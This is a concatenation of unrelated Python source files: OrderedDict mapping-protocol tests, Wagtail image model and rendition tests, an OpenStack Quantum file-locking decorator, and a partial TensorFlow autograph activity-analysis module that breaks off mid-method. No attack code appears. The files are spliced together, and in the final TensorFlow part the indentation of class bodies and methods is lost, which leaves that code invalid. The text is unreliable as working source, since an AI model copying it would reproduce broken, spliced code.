class PurePythonGeneralMappingTests(mapping_tests.BasicTestMappingProtocol):
    # Generic mapping-protocol conformance for the pure-Python OrderedDict.
    @classmethod
    def setUpClass(cls):
        cls.type2test = py_coll.OrderedDict
    def test_popitem(self):
        d = self._empty_mapping()
        self.assertRaises(KeyError, d.popitem)
@unittest.skipUnless(c_coll, 'requires the C version of the collections module')
class CPythonGeneralMappingTests(mapping_tests.BasicTestMappingProtocol):
    # Generic mapping-protocol conformance for the C OrderedDict.
    @classmethod
    def setUpClass(cls):
        cls.type2test = c_coll.OrderedDict
    def test_popitem(self):
        d = self._empty_mapping()
        self.assertRaises(KeyError, d.popitem)
class PurePythonSubclassMappingTests(mapping_tests.BasicTestMappingProtocol):
    # Mapping-protocol conformance for a subclass of the pure-Python OrderedDict.
    @classmethod
    def setUpClass(cls):
        class MyOrderedDict(py_coll.OrderedDict):
            pass
        cls.type2test = MyOrderedDict
    def test_popitem(self):
        d = self._empty_mapping()
        self.assertRaises(KeyError, d.popitem)
@unittest.skipUnless(c_coll, 'requires the C version of the collections module')
class CPythonSubclassMappingTests(mapping_tests.BasicTestMappingProtocol):
    # Mapping-protocol conformance for a subclass of the C OrderedDict.
    @classmethod
    def setUpClass(cls):
        class MyOrderedDict(c_coll.OrderedDict):
            pass
        cls.type2test = MyOrderedDict
    def test_popitem(self):
        d = self._empty_mapping()
        self.assertRaises(KeyError, d.popitem)
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
| |
import unittest
from willow.image import Image as WillowImage
from django.test import TestCase
from django.core.urlresolvers import reverse
from django.test.utils import override_settings
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Group, Permission
from django.core.files.uploadedfile import SimpleUploadedFile
from django.db.utils import IntegrityError
from django.db import connection
from wagtail.tests.utils import WagtailTestUtils
from wagtail.wagtailcore.models import Page
from wagtail.tests.testapp.models import EventPage, EventPageCarouselItem
from wagtail.wagtailimages.models import Rendition, Filter, SourceImageIOError
from wagtail.wagtailimages.rect import Rect
from .utils import Image, get_test_image_file
class TestImage(TestCase):
    ''' Unit tests for the Image model: orientation helpers, bounding rect,
        and focal point get/set/has behaviour. '''

    def setUp(self):
        # Create an image for running tests on
        self.image = Image.objects.create(
            title="Test image",
            file=get_test_image_file(),
        )

    def test_is_portrait(self):
        self.assertFalse(self.image.is_portrait())

    def test_is_landscape(self):
        self.assertTrue(self.image.is_landscape())

    def test_get_rect(self):
        # BUG FIX: this previously used assertTrue(a, b), which treats the
        # second argument as a failure *message* and therefore never compared
        # the rect at all.
        self.assertEqual(self.image.get_rect(), Rect(0, 0, 640, 480))

    def test_get_focal_point(self):
        self.assertEqual(self.image.get_focal_point(), None)
        # Add a focal point to the image
        self.image.focal_point_x = 100
        self.image.focal_point_y = 200
        self.image.focal_point_width = 50
        self.image.focal_point_height = 20
        # Get it
        self.assertEqual(self.image.get_focal_point(), Rect(75, 190, 125, 210))

    def test_has_focal_point(self):
        self.assertFalse(self.image.has_focal_point())
        # Add a focal point to the image
        self.image.focal_point_x = 100
        self.image.focal_point_y = 200
        self.image.focal_point_width = 50
        self.image.focal_point_height = 20
        self.assertTrue(self.image.has_focal_point())

    def test_set_focal_point(self):
        self.assertEqual(self.image.focal_point_x, None)
        self.assertEqual(self.image.focal_point_y, None)
        self.assertEqual(self.image.focal_point_width, None)
        self.assertEqual(self.image.focal_point_height, None)
        self.image.set_focal_point(Rect(100, 150, 200, 350))
        self.assertEqual(self.image.focal_point_x, 150)
        self.assertEqual(self.image.focal_point_y, 250)
        self.assertEqual(self.image.focal_point_width, 100)
        self.assertEqual(self.image.focal_point_height, 200)
        self.image.set_focal_point(None)
        self.assertEqual(self.image.focal_point_x, None)
        self.assertEqual(self.image.focal_point_y, None)
        self.assertEqual(self.image.focal_point_width, None)
        self.assertEqual(self.image.focal_point_height, None)
class TestImagePermissions(TestCase):
    """Checks Image.is_editable_by_user() for each standard permission role."""

    def setUp(self):
        # Accounts covering each permission level of interest.
        UserModel = get_user_model()
        self.user = UserModel.objects.create_user(username='user', email='user@email.com', password='password')
        self.owner = UserModel.objects.create_user(username='owner', email='owner@email.com', password='password')
        self.editor = UserModel.objects.create_user(username='editor', email='editor@email.com', password='password')
        self.editor.groups.add(Group.objects.get(name='Editors'))
        self.administrator = UserModel.objects.create_superuser(username='administrator', email='administrator@email.com', password='password')

        # The owner must hold add_image to count as the uploader.
        self.owner.user_permissions.add(Permission.objects.get(codename='add_image'))

        # The image under test, uploaded by the owner account.
        self.image = Image.objects.create(
            title="Test image",
            uploaded_by_user=self.owner,
            file=get_test_image_file(),
        )

    def test_administrator_can_edit(self):
        self.assertTrue(self.image.is_editable_by_user(self.administrator))

    def test_editor_can_edit(self):
        self.assertTrue(self.image.is_editable_by_user(self.editor))

    def test_owner_can_edit(self):
        self.assertTrue(self.image.is_editable_by_user(self.owner))

    def test_user_cant_edit(self):
        self.assertFalse(self.image.is_editable_by_user(self.user))
class TestRenditions(TestCase):
    """Covers rendition generation for the common filter specs."""

    def setUp(self):
        # 640x480 source image to resize.
        self.image = Image.objects.create(
            title="Test image",
            file=get_test_image_file(),
        )

    def test_minification(self):
        rend = self.image.get_rendition('width-400')
        # Width pinned at 400; height follows the 4:3 aspect ratio.
        self.assertEqual(rend.width, 400)
        self.assertEqual(rend.height, 300)

    def test_resize_to_max(self):
        rend = self.image.get_rendition('max-100x100')
        # Both dimensions must fit inside 100x100.
        self.assertEqual(rend.width, 100)
        self.assertEqual(rend.height, 75)

    def test_resize_to_min(self):
        rend = self.image.get_rendition('min-120x120')
        # Both dimensions must cover at least 120x120.
        self.assertEqual(rend.width, 160)
        self.assertEqual(rend.height, 120)

    def test_resize_to_original(self):
        rend = self.image.get_rendition('original')
        # 'original' keeps the source dimensions.
        self.assertEqual(rend.width, 640)
        self.assertEqual(rend.height, 480)

    def test_cache(self):
        # Requesting the same filter twice must return the stored rendition.
        first = self.image.get_rendition('width-400')
        second = self.image.get_rendition('width-400')
        self.assertEqual(first, second)
class TestUsageCount(TestCase):
    """Usage counting for images referenced from pages."""

    fixtures = ['test.json']

    def setUp(self):
        self.image = Image.objects.create(
            title="Test image",
            file=get_test_image_file(),
        )

    @override_settings(WAGTAIL_USAGE_COUNT_ENABLED=True)
    def test_unused_image_usage_count(self):
        # Nothing references the freshly created image yet.
        self.assertEqual(self.image.get_usage().count(), 0)

    @override_settings(WAGTAIL_USAGE_COUNT_ENABLED=True)
    def test_used_image_document_usage_count(self):
        # Attach the image to a carousel item on an existing event page.
        carousel_item = EventPageCarouselItem()
        carousel_item.page = EventPage.objects.get(id=4)
        carousel_item.image = self.image
        carousel_item.save()

        self.assertEqual(self.image.get_usage().count(), 1)
class TestGetUsage(TestCase):
    """Behaviour of Image.get_usage() with and without the setting enabled."""

    fixtures = ['test.json']

    def setUp(self):
        self.image = Image.objects.create(
            title="Test image",
            file=get_test_image_file(),
        )

    def test_image_get_usage_not_enabled(self):
        # With WAGTAIL_USAGE_COUNT_ENABLED off (the default), usage is empty.
        self.assertEqual(list(self.image.get_usage()), [])

    @override_settings(WAGTAIL_USAGE_COUNT_ENABLED=True)
    def test_unused_image_get_usage(self):
        self.assertEqual(list(self.image.get_usage()), [])

    @override_settings(WAGTAIL_USAGE_COUNT_ENABLED=True)
    def test_used_image_document_get_usage(self):
        # Attach the image to a carousel item on an existing event page.
        carousel_item = EventPageCarouselItem()
        carousel_item.page = EventPage.objects.get(id=4)
        carousel_item.image = self.image
        carousel_item.save()

        self.assertTrue(issubclass(Page, type(self.image.get_usage()[0])))
class TestGetWillowImage(TestCase):
    """Opening image files through the Willow wrapper."""

    fixtures = ['test.json']

    def setUp(self):
        self.image = Image.objects.create(
            title="Test image",
            file=get_test_image_file(),
        )

    def test_willow_image_object_returned(self):
        with self.image.get_willow_image() as willow_image:
            self.assertIsInstance(willow_image, WillowImage)

    def test_with_missing_image(self):
        # Image id=1 in the test fixtures has no file on disk; opening it
        # must raise SourceImageIOError rather than a bare IOError.
        missing = Image.objects.get(id=1)

        with self.assertRaises(SourceImageIOError):
            with missing.get_willow_image():
                self.fail()  # Shouldn't get here
class TestIssue573(TestCase):
    """
    Regression test for #573: a long original filename combined with a big
    focal point key could push the rendition filename past the field limit.
    """

    def test_issue_573(self):
        # An image with an oversized filename and an oversized focal point.
        long_name = 'thisisaverylongfilename-abcdefghijklmnopqrstuvwxyz-supercalifragilisticexpialidocious.png'
        image = Image.objects.create(
            title="Test image",
            file=get_test_image_file(long_name),
            focal_point_x=1000,
            focal_point_y=1000,
            focal_point_width=1000,
            focal_point_height=1000,
        )

        # Generating a rendition would crash here if the bug were present.
        image.get_rendition('fill-800x600')
class TestIssue613(TestCase, WagtailTestUtils):
    # Regression test for #613: tags submitted via the add/edit image admin
    # forms were not reaching the Elasticsearch index.

    def get_elasticsearch_backend(self):
        """Return the configured Elasticsearch backend, or skip the test.

        Scans WAGTAILSEARCH_BACKENDS for an entry whose BACKEND path is the
        Elasticsearch backend; raises unittest.SkipTest when none is found.
        """
        from django.conf import settings
        from wagtail.wagtailsearch.backends import get_search_backend

        backend_path = 'wagtail.wagtailsearch.backends.elasticsearch.ElasticSearch'

        # Search WAGTAILSEARCH_BACKENDS for an entry that uses the given backend path
        for backend_name, backend_conf in settings.WAGTAILSEARCH_BACKENDS.items():
            if backend_conf['BACKEND'] == backend_path:
                return get_search_backend(backend_name)
        else:
            # no conf entry found - skip tests for this backend
            raise unittest.SkipTest("No WAGTAILSEARCH_BACKENDS entry for the backend %s" % backend_path)

    def setUp(self):
        self.search_backend = self.get_elasticsearch_backend()
        self.login()

    def add_image(self, **params):
        """POSTs a new image through the admin and returns the created Image."""
        post_data = {
            'title': "Test image",
            'file': SimpleUploadedFile('test.png', get_test_image_file().file.getvalue()),
        }
        post_data.update(params)
        response = self.client.post(reverse('wagtailimages_add_image'), post_data)

        # Should redirect back to index
        self.assertRedirects(response, reverse('wagtailimages_index'))

        # Check that the image was created
        images = Image.objects.filter(title="Test image")
        self.assertEqual(images.count(), 1)

        # Test that size was populated correctly
        image = images.first()
        self.assertEqual(image.width, 640)
        self.assertEqual(image.height, 480)

        return image

    def edit_image(self, **params):
        """Creates an image, edits it through the admin, returns the result."""
        # Create an image to edit
        self.image = Image.objects.create(
            title="Test image",
            file=get_test_image_file(),
        )

        # Edit it
        post_data = {
            'title': "Edited",
        }
        post_data.update(params)
        response = self.client.post(reverse('wagtailimages_edit_image', args=(self.image.id,)), post_data)

        # Should redirect back to index
        self.assertRedirects(response, reverse('wagtailimages_index'))

        # Check that the image was edited
        image = Image.objects.get(id=self.image.id)
        self.assertEqual(image.title, "Edited")

        return image

    def test_issue_613_on_add(self):
        # Reset the search index
        self.search_backend.reset_index()
        self.search_backend.add_type(Image)

        # Add an image with some tags
        image = self.add_image(tags="hello")
        self.search_backend.refresh_index()

        # Search for it by tag
        results = self.search_backend.search("hello", Image)

        # Check
        self.assertEqual(len(results), 1)
        self.assertEqual(results[0].id, image.id)

    def test_issue_613_on_edit(self):
        # Reset the search index
        self.search_backend.reset_index()
        self.search_backend.add_type(Image)

        # Add an image with some tags
        image = self.edit_image(tags="hello")
        self.search_backend.refresh_index()

        # Search for it by tag
        results = self.search_backend.search("hello", Image)

        # Check
        self.assertEqual(len(results), 1)
        self.assertEqual(results[0].id, image.id)
class TestIssue312(TestCase):
    """Regression test for #312: duplicate renditions must be rejected."""

    def test_duplicate_renditions(self):
        image = Image.objects.create(
            title="Test image",
            file=get_test_image_file(),
        )

        # Asking for the same filter twice yields the same rendition row.
        first = image.get_rendition('fill-100x100')
        second = image.get_rendition('fill-100x100')
        self.assertEqual(first, second)

        # A manually inserted duplicate must trip the unique constraint.
        self.assertRaises(
            IntegrityError,
            Rendition.objects.create,
            image=first.image,
            filter=first.filter,
            width=first.width,
            height=first.height,
            focal_point_key=first.focal_point_key,
        )
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import errno
import functools
import os
import shutil
import tempfile
import time
import weakref
from eventlet import semaphore
from quantum.openstack.common import cfg
from quantum.openstack.common import fileutils
from quantum.openstack.common import log as logging
LOG = logging.getLogger(__name__)
# Configuration knobs for the locking helpers below.
util_opts = [
    cfg.BoolOpt('disable_process_locking', default=False,
                help='Whether to disable inter-process locks'),
    cfg.StrOpt('lock_path',
               # Default to the package's parent directory.
               default=os.path.abspath(os.path.join(os.path.dirname(__file__),
                                                    '../')),
               help='Directory to use for lock files')
]


CONF = cfg.CONF
CONF.register_opts(util_opts)
class _InterProcessLock(object):
    """Lock implementation which allows multiple locks, working around
    issues like bugs.debian.org/cgi-bin/bugreport.cgi?bug=632857 and does
    not require any cleanup. Since the lock is always held on a file
    descriptor rather than outside of the process, the lock gets dropped
    automatically if the process crashes, even if __exit__ is not executed.

    There are no guarantees regarding usage by multiple green threads in a
    single process here. This lock works only between processes. Exclusive
    access between local threads should be achieved using the semaphores
    in the @synchronized decorator.

    Note these locks are released when the descriptor is closed, so it's not
    safe to close the file descriptor while another green thread holds the
    lock. Just opening and closing the lock file can break synchronisation,
    so lock files must be accessed only using this abstraction.
    """

    def __init__(self, name):
        # `name` is the path of the lock file; it is (re)opened for writing
        # on every __enter__.
        self.lockfile = None
        self.fname = name

    def __enter__(self):
        self.lockfile = open(self.fname, 'w')

        while True:
            try:
                # Using non-blocking locks since green threads are not
                # patched to deal with blocking locking calls.
                # Also upon reading the MSDN docs for locking(), it seems
                # to have a laughable 10 attempts "blocking" mechanism.
                self.trylock()
                return self
            except IOError, e:
                if e.errno in (errno.EACCES, errno.EAGAIN):
                    # external locks synchronise things like iptables
                    # updates - give it some time to prevent busy spinning
                    time.sleep(0.01)
                else:
                    raise

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Best effort: log and swallow IOError so a cleanup failure does not
        # mask the exception (if any) propagating out of the with-block.
        try:
            self.unlock()
            self.lockfile.close()
        except IOError:
            LOG.exception(_("Could not release the acquired lock `%s`"),
                          self.fname)

    def trylock(self):
        # Platform-specific subclasses implement the non-blocking acquire.
        raise NotImplementedError()

    def unlock(self):
        # Platform-specific subclasses implement the release.
        raise NotImplementedError()
class _WindowsLock(_InterProcessLock):
    # Windows flavour built on msvcrt.locking with the non-blocking flag.
    # NOTE(review): msvcrt.locking is documented to take a file *descriptor*;
    # this passes the file object itself -- confirm behaviour on Windows.
    def trylock(self):
        msvcrt.locking(self.lockfile, msvcrt.LK_NBLCK, 1)

    def unlock(self):
        msvcrt.locking(self.lockfile, msvcrt.LK_UNLCK, 1)
class _PosixLock(_InterProcessLock):
    # POSIX flavour built on fcntl.lockf; LOCK_NB keeps the acquire
    # non-blocking so green threads are not stalled.
    def trylock(self):
        fcntl.lockf(self.lockfile, fcntl.LOCK_EX | fcntl.LOCK_NB)

    def unlock(self):
        fcntl.lockf(self.lockfile, fcntl.LOCK_UN)
# Pick the lock implementation (and import its platform module) at import
# time; os.name 'nt' means Windows, anything else is treated as POSIX.
if os.name == 'nt':
    import msvcrt
    InterProcessLock = _WindowsLock
else:
    import fcntl
    InterProcessLock = _PosixLock

# Weak values so semaphores for unused lock names can be garbage collected.
_semaphores = weakref.WeakValueDictionary()
def synchronized(name, lock_file_prefix, external=False, lock_path=None):
    """Synchronization decorator.

    Decorating a method like so::

        @synchronized('mylock')
        def foo(self, *args):
            ...

    ensures that only one thread will execute the foo method at a time.

    Different methods can share the same lock::

        @synchronized('mylock')
        def foo(self, *args):
            ...

        @synchronized('mylock')
        def bar(self, *args):
            ...

    This way only one of either foo or bar can be executing at a time.

    The lock_file_prefix argument is used to provide lock files on disk with a
    meaningful prefix. The prefix should end with a hyphen ('-') if specified.

    The external keyword argument denotes whether this lock should work across
    multiple processes. This means that if two different workers both run a
    method decorated with @synchronized('mylock', external=True), only one
    of them will execute at a time.

    The lock_path keyword argument is used to specify a special location for
    external lock files to live. If nothing is set, then CONF.lock_path is
    used as a default.
    """

    def wrap(f):
        @functools.wraps(f)
        def inner(*args, **kwargs):
            # NOTE(soren): If we ever go natively threaded, this will be racy.
            #              See http://stackoverflow.com/questions/5390569/dyn
            #              amically-allocating-and-destroying-mutexes
            sem = _semaphores.get(name, semaphore.Semaphore())
            if name not in _semaphores:
                # this check is not racy - we're already holding ref locally
                # so GC won't remove the item and there was no IO switch
                # (only valid in greenthreads)
                _semaphores[name] = sem

            with sem:
                LOG.debug(_('Got semaphore "%(lock)s" for method '
                            '"%(method)s"...'), {'lock': name,
                                                 'method': f.__name__})
                if external and not CONF.disable_process_locking:
                    LOG.debug(_('Attempting to grab file lock "%(lock)s" for '
                                'method "%(method)s"...'),
                              {'lock': name, 'method': f.__name__})
                    cleanup_dir = False

                    # We need a copy of lock_path because it is non-local
                    local_lock_path = lock_path
                    if not local_lock_path:
                        local_lock_path = CONF.lock_path

                    if not local_lock_path:
                        # No path configured anywhere: use a throwaway
                        # temporary directory.
                        cleanup_dir = True
                        local_lock_path = tempfile.mkdtemp()

                    if not os.path.exists(local_lock_path):
                        cleanup_dir = True
                        fileutils.ensure_tree(local_lock_path)

                    # NOTE(mikal): the lock name cannot contain directory
                    # separators
                    safe_name = name.replace(os.sep, '_')
                    lock_file_name = '%s%s' % (lock_file_prefix, safe_name)
                    lock_file_path = os.path.join(local_lock_path,
                                                  lock_file_name)

                    try:
                        lock = InterProcessLock(lock_file_path)
                        with lock:
                            LOG.debug(_('Got file lock "%(lock)s" at %(path)s '
                                        'for method "%(method)s"...'),
                                      {'lock': name,
                                       'path': lock_file_path,
                                       'method': f.__name__})
                            retval = f(*args, **kwargs)
                    finally:
                        # NOTE(vish): This removes the tempdir if we needed
                        #             to create one. This is used to cleanup
                        #             the locks left behind by unit tests.
                        if cleanup_dir:
                            shutil.rmtree(local_lock_path)
                else:
                    retval = f(*args, **kwargs)

            return retval
        return inner
    return wrap
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Activity analysis.
Requires qualified name annotations (see qual_names.py).
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import weakref
import gast
import six
from tensorflow.python.autograph.pyct import anno
from tensorflow.python.autograph.pyct import qual_names
from tensorflow.python.autograph.pyct import transformer
from tensorflow.python.autograph.pyct.static_analysis.annos import NodeAnno
class Scope(object):
    """Encloses local symbol definition and usage information.

    This can track for instance whether a symbol is modified in the current
    scope. Note that scopes do not necessarily align with Python's scopes. For
    example, the body of an if statement may be considered a separate scope.

    Caution - the AST references held by this object are weak.

    Scope objects are mutable during construction only, and must be frozen using
    `Scope.finalize()` before use. Furthermore, a scope is consistent only after
    all its children have been frozen. While analysing code blocks, scopes are
    being gradually built, from the innermost scope outward. Freezing indicates
    that the analysis of a code block is complete. Once frozen, mutation is no
    longer allowed. `is_final` tracks whether the scope is frozen or not.
    Certain properties, like `referenced`, are only accurate when called on
    frozen scopes.

    Attributes:
      parent: Optional[Scope], the parent scope, if any.
      isolated: bool, whether the scope is a true Python scope (e.g. the scope
        of a function), or just a surrogate tracking an ordinary code block.
      isolated_names: Set[qual_names.QN], identifiers that are isolated to this
        scope (even if the scope is not isolated).
      annotations: Set[qual_names.QN], identifiers used as type annotations in
        this scope.
      read: Set[qual_names.QN], identifiers read in this scope.
      modified: Set[qual_names.QN], identifiers modified in this scope.
      deleted: Set[qual_names.QN], identifiers deleted in this scope.
      bound: Set[qual_names.QN], names that are bound to this scope. See
        https://docs.python.org/3/reference/executionmodel.html#binding-of-names
        for a precise definition.
      globals: Set[qual_names.QN], names that are explicitly marked as global
        in this scope. Note that this doesn't include free read-only vars bound
        to global symbols.
      free_vars: Set[qual_names.QN], the free variables in this scope.
      params: WeakValueDictionary[qual_names.QN, ast.Node], function arguments
        visible in this scope, mapped to the function node that defines them.
      enclosing_scope: Scope, the innermost isolated scope that is a transitive
        parent of this scope. May be the scope itself.
      referenced: Set[qual_names.QN], the totality of the symbols used by this
        scope and its parents.
      is_final: bool, whether the scope is frozen or not.

    Note - simple statements may never delete and modify a symbol at the same
    time. However, compound ones like if statements can. In that latter case,
    it's undefined whether the symbol is actually modified or deleted upon
    statement exit. Certain analyses like reaching definitions need to be
    careful about this.
    """

    # Note: this mutable-immutable pattern is used because using a builder
    # would have taken a lot more boilerplate.

    def __init__(self, parent, isolated=True):
        """Create a new scope.

        Args:
          parent: A Scope or None.
          isolated: Whether the scope is isolated, that is, whether variables
            modified in this scope should be considered modified in the parent
            scope.
        """
        self.parent = parent
        self.isolated = isolated

        self.isolated_names = set()

        self.read = set()
        self.modified = set()
        self.deleted = set()

        self.bound = set()
        self.globals = set()
        self.annotations = set()

        self.params = weakref.WeakValueDictionary()

        # Certain fields can only be accessed after the scope and all its
        # parent scopes have been fully built. This field guards that.
        self.is_final = False

    @property
    def enclosing_scope(self):
        assert self.is_final
        if self.parent is not None and not self.isolated:
            return self.parent
        return self

    @property
    def referenced(self):
        if self.parent is not None:
            return self.read | self.parent.referenced
        return self.read

    @property
    def free_vars(self):
        enclosing_scope = self.enclosing_scope
        return enclosing_scope.read - enclosing_scope.bound

    def copy_from(self, other):
        """Recursively copies the contents of this scope from another scope."""
        assert not self.is_final
        if self.parent is not None:
            assert other.parent is not None
            self.parent.copy_from(other.parent)
        self.isolated_names = copy.copy(other.isolated_names)
        self.modified = copy.copy(other.modified)
        self.read = copy.copy(other.read)
        self.deleted = copy.copy(other.deleted)
        self.bound = copy.copy(other.bound)
        self.annotations = copy.copy(other.annotations)
        self.params = copy.copy(other.params)
        # NOTE(review): `globals` is not copied here -- confirm whether that
        # is intentional before relying on copies for global tracking.

    @classmethod
    def copy_of(cls, other):
        """Returns a deep copy of `other`, including its parent chain."""
        if other.parent is not None:
            parent = cls.copy_of(other.parent)
        else:
            parent = None
        new_copy = cls(parent)
        new_copy.copy_from(other)
        return new_copy

    def merge_from(self, other):
        """Adds all activity from another scope to this scope."""
        assert not self.is_final
        if self.parent is not None:
            assert other.parent is not None
            self.parent.merge_from(other.parent)
        self.isolated_names.update(other.isolated_names)
        self.read.update(other.read)
        self.modified.update(other.modified)
        # BUG FIX: this previously did `self.bound.update(other.deleted)`,
        # which dropped the other scope's bound names entirely and misfiled
        # its deleted names as bound. Merge each set into its counterpart.
        self.bound.update(other.bound)
        self.deleted.update(other.deleted)
        self.annotations.update(other.annotations)
        self.params.update(other.params)

    def finalize(self):
        """Freezes this scope, propagating activity into the parent."""
        assert not self.is_final
        # TODO(mdan): freeze read, modified, bound.
        if self.parent is not None:
            assert not self.parent.is_final
            if not self.isolated:
                # Ordinary code block: activity (minus names isolated to this
                # block) also belongs to the parent.
                self.parent.read.update(self.read - self.isolated_names)
                self.parent.modified.update(self.modified - self.isolated_names)
                self.parent.bound.update(self.bound - self.isolated_names)
                self.parent.globals.update(self.globals)
                self.parent.annotations.update(self.annotations)
            else:
                # True Python scope: only free (unbound) reads leak out.
                # TODO(mdan): This is not accurate.
                self.parent.read.update(self.read - self.bound)
                self.parent.annotations.update(self.annotations - self.bound)
        self.is_final = True

    def __repr__(self):
        return 'Scope{r=%s, w=%s}' % (tuple(self.read), tuple(self.modified))

    def mark_param(self, name, owner):
        # Assumption: all AST nodes have the same life span. This lets us use
        # a weak reference to mark the connection between a symbol node and the
        # function node whose argument that symbol is.
        self.params[name] = owner
class _Comprehension(object):
no_root = True
def __init__(self):
# TODO(mdan): Consider using an enum.
self.is_list_comp = False
self.targets = set()
class _FunctionOrClass(object):
def __init__(self):
self.node = None
class ActivityAnalyzer(transformer.Base):
"""Annotates nodes with local scope information.
See Scope.
The use of this class requires that qual_names.resolve() has been called on
the node. This class will ignore nodes that have not been
annotated with their qualified names.
"""
def __init__(self, context, parent_scope=None):
    """Initializes the analyzer.

    Args:
      context: transformer context for the analyzed code.
      parent_scope: Optional[Scope], the scope enclosing the analyzed code.
    """
    super(ActivityAnalyzer, self).__init__(context)
    self.allow_skips = False
    self.scope = Scope(parent_scope, isolated=True)

    # Note: all these flags crucially rely on the respective nodes are
    # leaves in the AST, that is, they cannot contain other statements.
    self._in_aug_assign = False
    self._in_annotation = False
    self._track_annotations_only = False
@property
def _in_constructor(self):
    # True when the innermost visited frame is a FunctionDef named __init__
    # whose immediate parent frame is a ClassDef.
    context = self.state[_FunctionOrClass]
    if context.level > 2:
        innermost = context.stack[-1].node
        parent = context.stack[-2].node
        return (isinstance(parent, gast.ClassDef) and
                (isinstance(innermost, gast.FunctionDef) and
                 innermost.name == '__init__'))
    return False
def _node_sets_self_attribute(self, node):
    """Returns True if `node` is a qualified name of the form self.<attr>."""
    if not anno.hasanno(node, anno.Basic.QN):
        return False
    qn = anno.getanno(node, anno.Basic.QN)
    # TODO(mdan): The 'self' argument is not guaranteed to be called 'self'.
    return bool(qn.has_attr and qn.parent.qn == ('self',))
def _track_symbol(self, node, composite_writes_alter_parent=False):
    """Records the read/write/delete activity of the symbol in `node`.

    Args:
      node: AST node carrying a Basic.QN annotation and a `ctx` field.
      composite_writes_alter_parent: bool, whether writing a composite symbol
        (e.g. self.x) also marks its parent (self) as modified.
    """
    # In annotation-only tracking mode, ignore everything that is not part
    # of an annotation (used when visiting argument declarations).
    if self._track_annotations_only and not self._in_annotation:
        return

    # A QN may be missing when we have an attribute (or subscript) on a function
    # call. Example: a().b
    if not anno.hasanno(node, anno.Basic.QN):
        return
    qn = anno.getanno(node, anno.Basic.QN)

    # When inside a comprehension, ignore reads to any of the comprehension's
    # targets. This includes attributes or slices of those arguments.
    for l in self.state[_Comprehension]:
        if qn in l.targets:
            return
        if qn.owner_set & set(l.targets):
            return

    if isinstance(node.ctx, gast.Store):
        # In comprehensions, modified symbols are the comprehension targets.
        if self.state[_Comprehension].level > 0:
            self.state[_Comprehension].targets.add(qn)
            # List comprehension targets leak in Python 2.
            # For details, see:
            # https://stackoverflow.com/questions/4198906/list-comprehension-rebinds-names-even-after-scope-of-comprehension-is-this-righ
            if not (six.PY2 and self.state[_Comprehension].is_list_comp):
                return

        self.scope.modified.add(qn)
        self.scope.bound.add(qn)
        if qn.is_composite and composite_writes_alter_parent:
            self.scope.modified.add(qn.parent)
        if self._in_aug_assign:
            # Augmented assignment reads the target as well.
            self.scope.read.add(qn)

    elif isinstance(node.ctx, gast.Load):
        self.scope.read.add(qn)
        if self._in_annotation:
            self.scope.annotations.add(qn)

    elif isinstance(node.ctx, gast.Param):
        self.scope.bound.add(qn)
        self.scope.mark_param(qn, self.state[_FunctionOrClass].node)

    elif isinstance(node.ctx, gast.Del):
        # The read matches the Python semantics - attempting to delete an
        # undefined symbol is illegal.
        self.scope.read.add(qn)
        # Targets of del are considered bound:
        # https://docs.python.org/3/reference/executionmodel.html#binding-of-names
        self.scope.bound.add(qn)
        self.scope.deleted.add(qn)

    else:
        raise ValueError('Unknown context {} for node "{}".'.format(
            type(node.ctx), qn))
def _enter_scope(self, isolated):
    # Pushes a new scope; `isolated` marks a true Python scope boundary.
    self.scope = Scope(self.scope, isolated=isolated)
def _exit_scope(self):
    # Pops the current scope, freezing it first so activity propagates
    # into the parent.
    exited_scope = self.scope
    exited_scope.finalize()
    self.scope = exited_scope.parent
    return exited_scope
def _exit_and_record_scope(self, node, tag=anno.Static.SCOPE):
    # Pops the current scope and attaches it to `node` under `tag`.
    node_scope = self._exit_scope()
    anno.setanno(node, tag, node_scope)
    return node_scope
def _process_statement(self, node):
    # Wraps a simple statement in its own (non-isolated) scope.
    self._enter_scope(False)
    node = self.generic_visit(node)
    self._exit_and_record_scope(node)
    return node
def _process_annotation(self, node):
    # Visits `node` with annotation tracking enabled, so names read inside
    # it are also recorded in scope.annotations.
    self._in_annotation = True
    node = self.visit(node)
    self._in_annotation = False
    return node
def visit_Import(self, node):
    # Import statements bind names; handled as plain statements.
    return self._process_statement(node)
def visit_ImportFrom(self, node):
    # from-import statements bind names; handled as plain statements.
    return self._process_statement(node)
def visit_Global(self, node):
    """Records names declared global as both read and global in scope."""
    self._enter_scope(False)
    qns = [qual_names.QN(declared) for declared in node.names]
    self.scope.read.update(qns)
    self.scope.globals.update(qns)
    self._exit_and_record_scope(node)
    return node
def visit_Nonlocal(self, node):
    """Records nonlocal declarations as both read and bound in scope."""
    self._enter_scope(False)
    qns = [qual_names.QN(declared) for declared in node.names]
    self.scope.read.update(qns)
    self.scope.bound.update(qns)
    self._exit_and_record_scope(node)
    return node
def visit_Expr(self, node):
    # Bare expression statement; tracked in its own statement scope.
    return self._process_statement(node)
def visit_Raise(self, node):
    # Raise statement; tracked in its own statement scope.
    return self._process_statement(node)
def visit_Return(self, node):
    # Return statement; tracked in its own statement scope.
    return self._process_statement(node)
def visit_Assign(self, node):
    # Plain assignment; tracked in its own statement scope.
    return self._process_statement(node)
def visit_AnnAssign(self, node):
    # Annotated assignment: the annotation is visited in annotation mode so
    # the names it reads land in scope.annotations.
    # NOTE(review): node.value may be None for a bare annotation like
    # `x: int` -- confirm self.visit handles None.
    self._enter_scope(False)
    node.target = self.visit(node.target)
    node.value = self.visit(node.value)
    if node.annotation:
